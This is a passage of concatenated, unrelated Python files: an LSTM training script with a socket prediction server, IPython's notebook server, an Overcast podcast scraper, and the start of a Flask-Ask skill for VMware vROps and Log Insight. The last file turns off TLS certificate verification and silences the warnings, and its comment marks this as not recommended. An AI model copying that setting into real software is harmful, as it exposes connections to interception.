client.write(','.join([str(value) for value in y_hat.flatten()]) + '\n')
except Exception as e:
print('Stop serving {} ({}).'.format(address, e))
self.lock.acquire()
try:
del self.channels[channel]
finally:
self.lock.release()
def _predict_server(self):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(self.bind_address)
server.listen(1)
print('Listening to {}...'.format(self.bind_address))
while True:
try:
connection, address = server.accept()
threading.Thread(target=self._predict_client, daemon=True,
args=(connection, address)).start()
except Exception as e:
print('Encountered a problem ({}).'.format(e))
class Saver:
def __init__(self, config):
self.backend = tf.train.Saver()
self.path = config.save_path
def save(self, session):
path = self.backend.save(session, self.path)
print('Saved the model in "{}".'.format(path))
def restore(self, session):
if os.path.isfile(self.path):
if input('Found a model in "{}". Restore? '.format(self.path)) != 'no':
self.backend.restore(session, self.path)
print('Restored. Continue learning...')
class Target:
def __init__(self, config):
database = Database(config)
data = database.read()[:, 0]
partition = database.partition()
sample_count = partition.shape[0]
samples, stack = {}, []
for k in range(sample_count):
i, j = partition[k]
samples[k] = data[i:j]
stack.append(samples[k])
data = np.concatenate(stack)
offset, scale = np.mean(data), np.std(data)
for k in range(sample_count):
samples[k] = np.reshape((samples[k] - offset) / scale, [-1, 1])
self.dimension_count = 1
self.sample_count = sample_count
self.samples = samples
def compute(self, k):
return self.samples[k]
class TestTarget:
def __init__(self, config):
self.dimension_count = 1
self.sample_count = 100000
def compute(self, k):
return np.reshape(np.sin(4 * np.pi / 40 * np.arange(0, 40)), [-1, 1])
def main(config):
learn = Learn(config)
target = Target(config)
monitor = Monitor(config)
learn.run(target, monitor, config)
if __name__ == '__main__':
database_path = Database.find()
output_path = os.path.dirname(database_path)
name = os.path.basename(database_path).replace('.sqlite3', '')
config = Config({
'dimension_count': 1,
'database_path': database_path,
'layer_count': 1,
'unit_count': 200,
'cell_clip': 1.0,
'forget_bias': 1.0,
'use_peepholes': True,
'network_initializer': tf.random_uniform_initializer(-0.01, 0.01),
'regression_initializer': tf.random_normal_initializer(stddev=0.01),
'learning_rate': 1e-3,
'gradient_clip': 1.0,
'epoch_count': 100,
'log_path': os.path.join(output_path, 'log'),
'save_path': os.path.join(output_path, '{}.model'.format(name)),
'bind_address': ('0.0.0.0', 4242),
'work_schedule': [1000 - 10, 10],
})
main(config)
|
notebookapp.py
|
# coding: utf-8
"""A tornado based IPython notebook server.
Authors:
* Brian Granger
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# stdlib
import errno
import logging
import os
import random
import re
import select
import signal
import socket
import sys
import threading
import time
import uuid
import webbrowser
# Third party
# check for pyzmq 2.1.11
from IPython.utils.zmqrelated import check_for_zmq
check_for_zmq('2.1.11', 'IPython.frontend.html.notebook')
import zmq
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 2.1.0
msg = "The IPython Notebook requires tornado >= 2.1.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (2,1,0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
# Our own libraries
from IPython.frontend.html.notebook import DEFAULT_STATIC_FILES_PATH
from .kernelmanager import MappingKernelManager
from .handlers import (LoginHandler, LogoutHandler,
ProjectDashboardHandler, NewHandler, NamedNotebookHandler,
MainKernelHandler, KernelHandler, KernelActionHandler, IOPubHandler,
ShellHandler, NotebookRootHandler, NotebookHandler, NotebookCopyHandler,
RSTHandler, AuthenticatedFileHandler, PrintNotebookHandler,
MainClusterHandler, ClusterProfileHandler, ClusterActionHandler,
FileFindHandler, NotebookRedirectHandler,
)
from .nbmanager import NotebookManager
from .filenbmanager import FileNotebookManager
from .clustermanager import ClusterManager
from IPython.config.application import catch_config_error, boolean_flag
from IPython.core.application import BaseIPythonApplication
from IPython.core.profiledir import ProfileDir
from IPython.frontend.consoleapp import IPythonConsoleApp
from IPython.kernel import swallow_argv
from IPython.kernel.zmq.session import Session, default_secure
from IPython.kernel.zmq.zmqshell import ZMQInteractiveShell
from IPython.kernel.zmq.kernelapp import (
kernel_flags,
kernel_aliases,
IPKernelApp
)
from IPython.utils.importstring import import_item
from IPython.utils.localinterfaces import LOCALHOST
from IPython.utils.traitlets import (
Dict, Unicode, Integer, List, Enum, Bool,
DottedObjectName
)
from IPython.utils import py3compat
from IPython.utils.path import filefind
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
_kernel_action_regex = r"(?P<action>restart|interrupt)"
_notebook_id_regex = r"(?P<notebook_id>\w+-\w+-\w+-\w+-\w+)"
_notebook_name_regex = r"(?P<notebook_name>.+\.ipynb)"
_profile_regex = r"(?P<profile>[^\/]+)" # there is almost no text that is invalid
_cluster_action_regex = r"(?P<action>start|stop)"
_examples = """
ipython notebook # start the notebook
ipython notebook --profile=sympy # use the sympy profile
ipython notebook --pylab=inline # pylab in inline plotting mode
ipython notebook --certfile=mycert.pem # use SSL/TLS certificate
ipython notebook --port=5555 --ip=* # Listen on port 5555, all interfaces
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def url_path_join(a,b):
if a.endswith('/') and b.startswith('/'):
return a[:-1]+b
else:
return a+b
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield port + random.randint(-2*n, 2*n)
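# Example (added for clarity): random_ports(8888, 10) yields 8888 through 8892 first,
# then five more ports drawn uniformly from [8868, 8908].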
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, ipython_app, kernel_manager, notebook_manager,
cluster_manager, log,
base_project_url, settings_overrides):
handlers = [
(r"/", ProjectDashboardHandler),
(r"/login", LoginHandler),
(r"/logout", LogoutHandler),
(r"/new", NewHandler),
(r"/%s" % _notebook_id_regex, NamedNotebookHandler),
(r"/%s" % _notebook_name_regex, NotebookRedirectHandler),
(r"/%s/copy" % _notebook_id_regex, NotebookCopyHandler),
(r"/%s/print" % _notebook_id_regex, PrintNotebookHandler),
(r"/kernels", MainKernelHandler),
(r"/kernels/%s" % _kernel_id_regex, KernelHandler),
(r"/kernels/%s/%s" % (_kernel_id_regex, _kernel_action_regex), KernelActionHandler),
(r"/kernels/%s/iopub" % _kernel_id_regex, IOPubHandler),
(r"/kernels/%s/shell" % _kernel_id_regex, ShellHandler),
(r"/notebooks", NotebookRootHandler),
(r"/notebooks/%s" % _notebook_id_regex, NotebookHandler),
(r"/rstservice/render", RSTHandler),
(r"/files/(.*)", AuthenticatedFileHandler, {'path' : notebook_manager.notebook_dir}),
(r"/clusters", MainClusterHandler),
(r"/clusters/%s/%s" % (_profile_regex, _cluster_action_regex), ClusterActionHandler),
(r"/clusters/%s" % _profile_regex, ClusterProfileHandler),
]
# Python < 2.6.5 doesn't accept unicode keys in f(**kwargs), and
# base_project_url will always be unicode, which will in turn
# make the patterns unicode, and ultimately result in unicode
# keys in kwargs to handler._execute(**kwargs) in tornado.
# This enforces that base_project_url be ascii in that situation.
#
# Note that the URLs these patterns check against are escaped,
# and thus guaranteed to be ASCII: 'héllo' is really 'h%C3%A9llo'.
base_project_url = py3compat.unicode_to_str(base_project_url, 'ascii')
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=ipython_app.static_file_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_project_url,'/static/'),
cookie_secret=os.urandom(1024),
login_url=url_path_join(base_project_url,'/login'),
cookie_name='username-%s' % uuid.uuid4(),
base_project_url = base_project_url,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
# prepend base_project_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(base_project_url, handler[0])
new_handler = tuple([pattern]+list(handler[1:]))
new_handlers.append( new_handler )
super(NotebookWebApplication, self).__init__(new_handlers, **settings)
self.kernel_manager = kernel_manager
self.notebook_manager = notebook_manager
self.cluster_manager = cluster_manager
self.ipython_app = ipython_app
self.read_only = self.ipython_app.read_only
self.config = self.ipython_app.config
self.use_less = self.ipython_app.use_less
self.log = log
self.jinja2_env = Environment(loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), "templates")))
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(kernel_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
"Don't open the notebook in a browser after startup."
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library IPython uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['read-only'] = (
{'NotebookApp' : {'read_only' : True}},
"""Allow read-only access to notebooks.
When using a password to protect the notebook server, this flag
allows unauthenticated clients to view the notebook list, and
individual notebooks, but not edit them, start kernels, or run
code.
If no password is set, the server will be entirely read-only.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileNotebookManager.save_script',
    'Auto-save a .py script every time the .ipynb notebook is saved',
'Do not auto-save .py scripts for every notebook'))
# the flags that are specific to the frontend
# these must be scrubbed before being passed to the kernel,
# or it will raise an error on unrecognized flags
notebook_flags = ['no-browser', 'no-mathjax', 'read-only', 'script', 'no-script']
aliases = dict(kernel_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'notebook-dir': 'NotebookManager.notebook_dir',
'browser': 'NotebookApp.browser',
})
# remove ipkernel flags that are singletons, and don't make sense in
# multi-kernel environment:
aliases.pop('f', None)
notebook_aliases = [u'port', u'port-retries', u'ip', u'keyfile', u'certfile',
u'notebook-dir']
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(BaseIPythonApplication):
name = 'ipython-notebook'
default_config_file_name='ipython_notebook_config.py'
description = """
The IPython HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an
HTML5/Javascript Notebook client.
"""
examples = _examples
classes = IPythonConsoleApp.classes + [MappingKernelManager, NotebookManager,
FileNotebookManager]
flags = Dict(flags)
aliases = Dict(aliases)
kernel_argv = List(Unicode)
log_level = Enum((0,10,20,30,40,50,'DEBUG','INFO','WARN','ERROR','CRITICAL'),
default_value=logging.INFO,
config=True,
help="Set the log level by value or name.")
# create requested profiles by default, if they don't exist:
auto_create = Bool(True)
# file to be opened in the notebook server
file_to_run = Unicode('')
# Network related information.
ip = Unicode(LOCALHOST, config=True,
help="The IP address the notebook server will listen on."
)
def _ip_changed(self, name, old, new):
if new == u'*': self.ip = u''
port = Integer(8888, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from IPython.lib import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
read_only = Bool(False, config=True,
help="Whether to prevent editing/execution of notebooks."
)
use_less = Bool(False, config=True,
        help="""Whether to use browser-side less-css parsing
        instead of the compiled css version in templates that allow
        it. This is mainly convenient when working on the less
        file to avoid a build step, or if the user wants to overwrite
some of the less variables without having to recompile
everything.
You will need to install the less.js component in the static directory
either in the source tree or in your profile folder.
""")
webapp_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"IPython notebook uses.")
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library IPython uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
def _enable_mathjax_changed(self, name, old, new):
"""set mathjax url to empty if mathjax is disabled"""
if not new:
self.mathjax_url = u''
base_project_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
def _base_project_url_changed(self, name, old, new):
if not new.startswith('/'):
self.base_project_url = '/'+new
elif not new.endswith('/'):
self.base_project_url = new+'/'
base_kernel_url = Unicode('/', config=True,
help='''The base URL for the kernel server
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
def _base_kernel_url_changed(self, name, old, new):
if not new.startswith('/'):
self.base_kernel_url = '/'+new
elif not new.endswith('/'):
self.base_kernel_url = new+'/'
websocket_host = Unicode("", config=True,
help="""The hostname for the websocket server."""
)
extra_static_paths = List(Unicode, config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
def _extra_static_paths_default(self):
return [os.path.join(self.profile_dir.location, 'static')]
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
mathjax_url = Unicode("", config=True,
help="""The url for MathJax.js."""
)
def _mathjax_url_default(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.webapp_settings.get("static_url_prefix",
"/static/")
try:
mathjax = filefind(os.path.join('mathjax', 'MathJax.js'), self.static_file_path)
except IOError:
if self.certfile:
# HTTPS: load from Rackspace CDN, because SSL certificate requires it
base = u"https://c328740.ssl.cf1.rackcdn.com"
else:
base = u"http://cdn.mathjax.org"
url = base + u"/mathjax/latest/MathJax.js"
self.log.info("Using MathJax from CDN: %s", url)
return url
else:
self.log.info("Using local MathJax from %s" % mathjax)
return static_url_prefix+u"mathjax/MathJax.js"
def _mathjax_url_changed(self, name, old, new):
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info("Using MathJax: %s", new)
notebook_manager_class = DottedObjectName('IPython.frontend.html.notebook.filenbmanager.FileNotebookManager',
config=True,
help='The notebook manager class to use.')
trust_xheaders = Bool(False, config=True,
        help=("Whether or not to trust X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers "
              "sent by the upstream reverse proxy. Necessary if the proxy handles SSL.")
)
def parse_command_line(self, argv=None):
super(NotebookApp, self).parse_command_line(argv)
if argv is None:
argv = sys.argv[1:]
# Scrub frontend-specific flags
self.kernel_argv = swallow_argv(argv, notebook_aliases, notebook_flags)
# Kernel should inherit default config file from frontend
self.kernel_argv.append("--IPKernelApp.parent_appname='%s'" % self.name)
if self.extra_args:
f = os.path.abspath(self.extra_args[0])
if os.path.isdir(f):
nbdir = f
else:
self.file_to_run = f
nbdir = os.path.dirname(f)
self.config.NotebookManager.notebook_dir = nbdir
def init_configurables(self):
# force Session default to be secure
default_secure(self.config)
self.kernel_manager = MappingKernelManager(
config=self.config, log=self.log, kernel_argv=self.kernel_argv,
connection_dir = self.profile_dir.security_dir,
)
kls = import_item(self.notebook_manager_class)
self.notebook_manager = kls(config=self.config, log=self.log)
self.notebook_manager.load_notebook_names()
self.cluster_manager = ClusterManager(config=self.config, log=self.log)
self.cluster_manager.update_profiles()
def init_logging(self):
        # This prevents double log messages because tornado uses a root logger that
        # self.log is a child of. The logging module dispatches log messages to a logger
        # and all of its ancestors until propagate is set to False.
self.log.propagate = False
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.notebook_manager,
self.cluster_manager, self.log,
self.base_project_url, self.webapp_settings
)
if self.certfile:
ssl_options = dict(certfile=self.certfile)
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
else:
ssl_options = None
self.web_app.password = self.password
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
if not self.ip:
warning = "WARNING: The notebook server is listening on all IP addresses"
if ssl_options is None:
                self.log.critical(warning + " and not using encryption. This "
                                  "is not recommended.")
            if not self.password and not self.read_only:
                self.log.critical(warning + " and not using authentication. "
                                  "This is highly insecure and not recommended.")
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
# XXX: remove the e.errno == -9 block when we require
# tornado >= 3.0
if e.errno == -9 and tornado.version_info[0] < 3:
# The flags passed to socket.getaddrinfo from
# tornado.netutils.bind_sockets can cause "gaierror:
# [Errno -9] Address family for hostname not supported"
# when the interface is not associated, for example.
# Changing the flags to exclude socket.AI_ADDRCONFIG does
# not cause this error, but the only way to do this is to
# monkeypatch socket to remove the AI_ADDRCONFIG attribute
saved_AI_ADDRCONFIG = socket.AI_ADDRCONFIG
self.log.warn('Monkeypatching socket to fix tornado bug')
del(socket.AI_ADDRCONFIG)
try:
# retry the tornado call without AI_ADDRCONFIG flags
self.http_server.listen(port, self.ip)
except socket.error as e2:
e = e2
else:
self.port = port
success = True
break
                    # restore the monkeypatch
socket.AI_ADDRCONFIG = saved_AI_ADDRCONFIG
if e.errno != errno.EADDRINUSE:
raise
self.log.info('The port %i is already in use, trying another random port.' % port)
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
def init_signal(self):
if not sys.platform.startswith('win'):
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
# FIXME: remove this delay when pyzmq dependency is >= 2.1.11
time.sleep(0.1)
info = self.log.info
info('interrupted')
print self.notebook_info()
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y'):
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.instance().stop()
return
else:
print "No answer for 5s:",
print "resuming operation..."
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.instance().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.instance().stop()
def _signal_info(self, sig, frame):
print self.notebook_info()
@catch_config_error
def initialize(self, argv=None):
self.init_logging()
super(NotebookApp, self).initialize(argv)
self.init_configurables()
self.init_webapp()
self.init_signal()
def cleanup_kernels(self):
"""Shutdown all kernels.
        The kernels will shut themselves down when this process no longer exists,
        but explicit shutdown allows the KernelManagers to clean up the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
mgr_info = self.notebook_manager.info_string() + "\n"
return mgr_info +"The IPython Notebook is running at: %s" % self._url
    def start(self):
        """ Start the IPython Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
ip = self.ip if self.ip else '[all ip addresses on your system]'
proto = 'https' if self.certfile else 'http'
info = self.log.info
self._url = "%s://%s:%i%s" % (proto, ip, self.port,
self.base_project_url)
for line in self.notebook_info().split("\n"):
info(line)
info("Use Control-C to stop this server and shut down all kernels.")
if self.open_browser or self.file_to_run:
ip = self.ip or LOCALHOST
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warn('No web browser found: %s.' % e)
browser = None
if self.file_to_run:
name, _ = os.path.splitext(os.path.basename(self.file_to_run))
url = self.notebook_manager.rev_mapping.get(name, '')
else:
url = ''
if browser:
b = lambda : browser.open("%s://%s:%i%s%s" % (proto, ip,
self.port, self.base_project_url, url), new=2)
threading.Thread(target=b).start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.cleanup_kernels()
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
def launch_new_instance():
app = NotebookApp.instance()
app.initialize()
app.start()
|
overcast.py
|
"""
An overcast "API".
Overcast doesn't really offer an official API, so this just sorta apes it.
"""
import requests
import lxml.html
import urlparse
import utilities
import logging
import threading
log = logging.getLogger('overcast-sonos')
class Overcast(object):
def __init__(self, email, password):
self.session = requests.session()
r = self.session.post('https://overcast.fm/login', {'email': email, 'password': password})
doc = lxml.html.fromstring(r.content)
alert = doc.cssselect('div.alert')
if alert:
raise Exception("Can't login: {}".format(alert[0].text_content().strip()))
def _get_html(self, url):
return lxml.html.fromstring(self.session.get(url).content.replace('\n', '').replace(' ', '').replace(' ', ''))
def get_active_episodes(self, get_details=False):
active_episodes = []
active_episodes_dictionary = {}
doc = self._get_html('https://overcast.fm/podcasts')
for index, cell in enumerate(doc.cssselect('a.episodecell')):
if 'href' in cell.attrib:
if get_details:
episode_id = cell.attrib['href']
time_remaining_seconds = self.get_episode_time_remaining_seconds_from_episode_cell(cell, False)
t = threading.Thread(target=self.add_episode_detail_to, args=(active_episodes_dictionary, index, episode_id, time_remaining_seconds))
t.setDaemon(True)
t.start()
else:
active_episodes.append({
'id': urlparse.urljoin('https://overcast.fm', cell.attrib['href']).lstrip('/'),
'title': cell.cssselect('div.titlestack div.caption2')[0].text_content(),
'audio_type': 'audio/mpeg',
'podcast_title': cell.cssselect('div.titlestack div.title')[0].text_content(),
'albumArtURI': cell.cssselect('img')[0].attrib['src'],
'duration': -1,
})
main_thread = threading.currentThread()
for t in threading.enumerate():
if t is not main_thread:
log.debug('''Joining on thread %s''', t.getName())
t.join()
if not active_episodes:
active_episodes = [active_episodes_dictionary[key] for key in sorted(active_episodes_dictionary)]
return active_episodes
def add_episode_detail_to(self, ordered_episodes, key, episode_id, time_remaining_seconds=None):
ordered_episodes[key] = self.get_episode_detail(episode_id, time_remaining_seconds)
def get_episode_detail(self, episode_id, time_remaining_seconds=None):
episode_href = urlparse.urljoin('https://overcast.fm', episode_id)
doc = self._get_html(episode_href)
time_elapsed_seconds = int(doc.cssselect('audio#audioplayer')[0].attrib['data-start-time'])
time_remaining_seconds = time_remaining_seconds or self.get_episode_time_remaining_seconds(episode_id, doc)
if time_elapsed_seconds is None or time_remaining_seconds is None:
duration = -1
else:
duration = time_elapsed_seconds + time_remaining_seconds
if time_elapsed_seconds == duration:
duration = -1
return {
'id': episode_href.lstrip('/'),
'title': doc.cssselect('div.centertext h2')[0].text_content(),
'podcast_title': doc.cssselect('div.centertext h3 a')[0].text_content(),
'offsetMillis': time_elapsed_seconds * 1000,
'duration': duration,
'data_item_id': doc.cssselect('audio#audioplayer')[0].attrib['data-item-id'],
'data_sync_version': doc.cssselect('audio#audioplayer')[0].attrib['data-sync-version'],
'albumArtURI': doc.cssselect('div.fullart_container img')[0].attrib['src'],
'parsed_audio_uri': doc.cssselect('audio#audioplayer source')[0].attrib['src'],
'audio_type': doc.cssselect('audio#audioplayer source')[0].attrib['type'],
'delete_episode_uri': doc.cssselect('a#delete_episode_button')[0].attrib['href']
}
def get_episode_time_remaining_seconds(self, episode_id, episode_html):
log.debug('''getting the remaining time. episode id is %s''', episode_id)
podcast_id = episode_html.cssselect('div.centertext h3 a')[0].attrib['href']
podcast_href = urlparse.urljoin('https://overcast.fm', podcast_id)
doc = self._get_html(podcast_href)
for cell in doc.cssselect('a.extendedepisodecell'):
if episode_id in cell.attrib['href']:
return self.get_episode_time_remaining_seconds_from_episode_cell(cell, True)
def get_episode_time_remaining_seconds_from_episode_cell(self, cell, is_extended_cell):
#unparsed_time_remaining_index = 1 if is_extended_cell else 2
unparsed_time_remaining = cell.cssselect('div.titlestack div.caption2')[0].text_content()
time_remaining_seconds = utilities.duration_in_seconds(unparsed_time_remaining)
return time_remaining_seconds
def get_all_podcasts(self):
doc = self._get_html('https://overcast.fm/podcasts')
return [
{
'id': cell.attrib['href'].lstrip('/'),
'title': cell.cssselect('div.title')[0].text_content(),
'albumArtURI': cell.cssselect('img')[0].attrib['src'],
}
for cell in doc.cssselect('a.feedcell')
if 'href' in cell.attrib
]
def get_all_podcast_episodes(self, podcast_id):
"""
get all episodes (played or not) for a podcast.
"""
podcast_href = urlparse.urljoin('https://overcast.fm', podcast_id)
doc = self._get_html(podcast_href)
albumArtURI = doc.cssselect('img.art')[0].attrib['src']
podcast_title = doc.cssselect('h2.centertext')[0].text_content()
return [
# NOTE: If the hardcoded audio_type causes any problems, just uncomment the line below and comment out the dictionary below it.
# self.get_episode_detail(cell.attrib['href'])
{
'id': urlparse.urljoin('https://overcast.fm', cell.attrib['href']).lstrip('/'),
'title': cell.cssselect('div.titlestack div.title')[0].text_content(),
'audio_type': 'audio/mpeg',
'podcast_title': podcast_title,
'albumArtURI': albumArtURI,
}
for cell in doc.cssselect('a.extendedepisodecell')
if 'href' in cell.attrib
]
def update_episode_offset(self, episode, updated_offset_seconds):
log.debug("updated_offset_seconds = %d and duration = %d", updated_offset_seconds, episode['duration'])
url = 'https://overcast.fm/podcasts/set_progress/' + episode['data_item_id']
params = {'p': updated_offset_seconds, 'speed': 0, 'v': episode['data_sync_version']}
log.debug('Updating offset of episode with id %s to %d', episode['id'], updated_offset_seconds)
self.session.post(url, params)
if updated_offset_seconds >= episode['duration'] - 30:
self.delete_episode(episode)
def delete_episode(self, episode):
url = 'https://overcast.fm' + episode['delete_episode_uri']
log.debug('Deleting episode with id %s', episode['id'])
self.session.post(url)
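# Hedged usage sketch, not part of the original module; the e-mail address and password
# below are placeholders. Passing get_details=True would instead fetch full details for
# each episode in background threads before returning the ordered results.
if __name__ == '__main__':
    overcast = Overcast('user@example.com', 'password')
    for episode in overcast.get_active_episodes():
        print(episode['title'])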
|
vrobbie.py
|
#!/usr/bin/python
import json
import logging
import requests
import collections
import time
import re
import sys
import os
from threading import Thread
from operator import itemgetter
from itertools import groupby
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session, request, context, version
# Vars and Configurations
bearertoken = ""
# Edit with IP or FQDN of vrops and LI node
vropsHost = ""
liHost = ""
# Authentication is initially via the credentials set below. Subsequent calls use a
# bearer token.
vropsuser = ""
vropspassword = ""
vropsauthsource = "local"
liprovider = "ActiveDirectory"
liusername = ""
lipassword = ""
# For some labs, using self-signed certificates will result in an error during requests due
# to the certificate check; flip this flag to False to bypass certificate checking in those
# cases. I have suppressed the warning normally thrown by urllib3, but this is NOT RECOMMENDED!
verify = False
if not verify:
requests.packages.urllib3.disable_warnings()
app = Flask(__name__)
ask = Ask(app,"/")
logging.getLogger("flask_ask").setLevel(logging.DEBUG)
##############################################
# HELPERS
# - Fetchers
# - Handling voice service errors
# - Parsing and preparing response_msg
##############################################
def datacenter_report():
while True:
dc_report_dict = dict()
token = json.loads(liGetToken(liusername, lipassword, liprovider))
dc_report_dict["vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000", "bin-width=all&aggregation-function=UCOUNT&aggregation-field=com.vmware.vsphere:vmw_hostd_vmotion_id", token["sessionId"]))
dc_report_dict["DRS vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS DrmExecuteVMotionLRO", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Created"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmCreatedEvent/vc_event_type/CONTAINS com.vmware.vim25.vmclonedevent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Deleted"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmRemovedEvent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["RConsole Sessions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS Local connection for mks established", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
with open("prefetch/dcreport", 'w') as outfile:
json.dump(dc_report_dict, outfile)
print "dcreport updated at " + time.strftime("%Y-%m-%d %H:%M:%S")
time.sleep(300)
def more_info():
#Called when user wants more information on the impacted resource from the Alerts tree
if session.attributes["CurrentTree"] == "Alerts":
resource = vropsRequest("api/resources/"+session.attributes["CurrentObject"],"GET")
alertsQueryPayload = {
'resource-query': {
